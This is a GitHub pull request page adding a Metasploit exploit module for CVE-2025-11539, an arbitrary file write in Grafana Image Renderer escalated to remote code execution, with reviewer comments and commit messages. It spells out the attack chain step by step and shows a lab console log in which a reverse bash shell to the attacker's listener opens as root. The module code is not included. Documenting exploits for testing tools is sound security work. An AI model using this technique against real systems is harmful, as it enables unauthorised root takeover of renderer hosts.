Skip to content

Add Grafana Image Renderer arbitrary file write RCE module (CVE-2025-11539)#21055

Open
exploitintel wants to merge 4 commits intorapid7:masterfrom
exploitintel:add-grafana-renderer-file-write-rce
Open

Add Grafana Image Renderer arbitrary file write RCE module (CVE-2025-11539)#21055
exploitintel wants to merge 4 commits intorapid7:masterfrom
exploitintel:add-grafana-renderer-file-write-rce

Conversation

@exploitintel
Copy link

@exploitintel exploitintel commented Mar 4, 2026

Summary

  • Adds a new exploit module for CVE-2025-11539, an arbitrary file write to RCE in Grafana Image Renderer 1.0.0 through 4.0.16
  • The /render/csv endpoint lacks validation of the filePath parameter, allowing an authenticated attacker (default token is a single hyphen -) to write arbitrary content to any path on the renderer filesystem
  • The module escalates the file write to RCE by dropping a shell snippet into /etc/chromium.d/, which the Debian Chromium wrapper sources on every Chromium launch
  • A raw TCP socket is held open to stall sendFile via TCP backpressure, preventing the server's unlink callback from firing until after Chromium sources the snippet

Technique

  1. Serve a download trigger HTML page (JavaScript Blob) from a local HTTP server
  2. Send /render/csv?url=<attacker-http>&filePath=/etc/chromium.d/msf via a raw TCP socket (response body intentionally not read)
  3. Renderer navigates Chromium to attacker URL, JS triggers a Blob download, chokidar detects it and fs.copyFileSync writes it to the target path
  4. sendFile stalls on the unread TCP socket — file is NOT deleted
  5. A /render request on a fresh connection launches a new Chromium process, the wrapper sources /etc/chromium.d/*, payload fires

Verification

Tested against Grafana Image Renderer 4.0.16 / Debian 12 bookworm (Docker lab):

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > check

[+] 192.168.240.4:8081 - The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > run -z

[*] Started reverse TCP handler on 192.168.240.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. File write via /render confirmed (HTTP 200, image/png).
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Starting download server on 192.168.240.3:8888
[*] Writing snippet to /etc/chromium.d/msf via /render/csv
[*] Waiting for renderer to fetch payload...
[+] Download served -- snippet delivered to renderer
[*] Waiting for file write and sendFile stall...
[*] Triggering Chromium launch via /render
[+] Render triggered -- payload executing
[*] Command shell session 1 opened (192.168.240.3:4444 -> 192.168.240.4:48586) at 2026-03-04 17:01:24 +0000

msf6 exploit(multi/http/grafana_renderer_file_write_rce) > sessions -c "id && hostname && uname -a && cat /etc/os-release | head -3" -i 1

[*] Running 'id && hostname && uname -a && cat /etc/os-release | head -3' on shell session 1 (192.168.240.4)
uid=0(root) gid=0(root) groups=0(root)
Linux 6.12.69-linuxkit #1 SMP x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"

Module details

  • Affected versions: Grafana Image Renderer 1.0.0 through 4.0.16
  • Auth required: Default token only (-) — effectively unauthenticated in many deployments
  • Targets: Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
  • AutoCheck: Yes — confirms file write via /render with auth token
  • Rank: Excellent
  • OS requirement: Debian/Ubuntu with /usr/bin/chromium wrapper (sources /etc/chromium.d/*)

References

@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Mar 4, 2026

This one also has extra files and commits in the PR that are not aligned with the description. Can you please drop the extra modules?

@smcintyre-r7 smcintyre-r7 added module needs-docs rn-modules release notes for new or majorly enhanced modules labels Mar 4, 2026
@github-actions
Copy link

github-actions bot commented Mar 4, 2026

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@exploitintel exploitintel force-pushed the add-grafana-renderer-file-write-rce branch from af8f303 to 9b666cb Compare March 4, 2026 21:06
@exploitintel
Add Grafana Image Renderer arbitrary file write RCE (CVE-2025-11539)
c5534db 
Grafana Image Renderer 1.0.0 through 4.0.16 allows arbitrary file
write via path traversal in the filePath parameter of /render/csv.
The module authenticates with the default auth token, writes a shell
snippet to /etc/chromium.d/ (sourced by the Debian Chromium wrapper
on every launch), then triggers a /render request to execute the
payload. A raw TCP socket held open prevents sendFile from completing,
keeping the file in place until Chromium sources it.

Targets: Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
Tested against Grafana Image Renderer 4.0.16 / Debian 12 (bookworm)
@exploitintel
Add documentation for grafana_renderer_file_write_rce (CVE-2025-11539)
6ea0d87
@exploitintel exploitintel force-pushed the add-grafana-renderer-file-write-rce branch from 9b666cb to 6ea0d87 Compare March 4, 2026 21:26
@exploitintel
Copy link
Author

exploitintel commented Mar 10, 2026

Thanks for flagging! Same here — the branch only contains the two commits for this module (the exploit + doc). Could you take another look? Let me know if anything still looks off.

@exploitintel
Address reviewer feedback: replace CmdStager with fetch payloads (CVE…
b1e9ed5 
…-2025-11539)

Drop Linux Dropper target and CmdStager mixin in favor of a single
Linux/Unix Command target with fetch payload default.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

module needs-docs rn-modules release notes for new or majorly enhanced modules

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@exploitintel @smcintyre-r7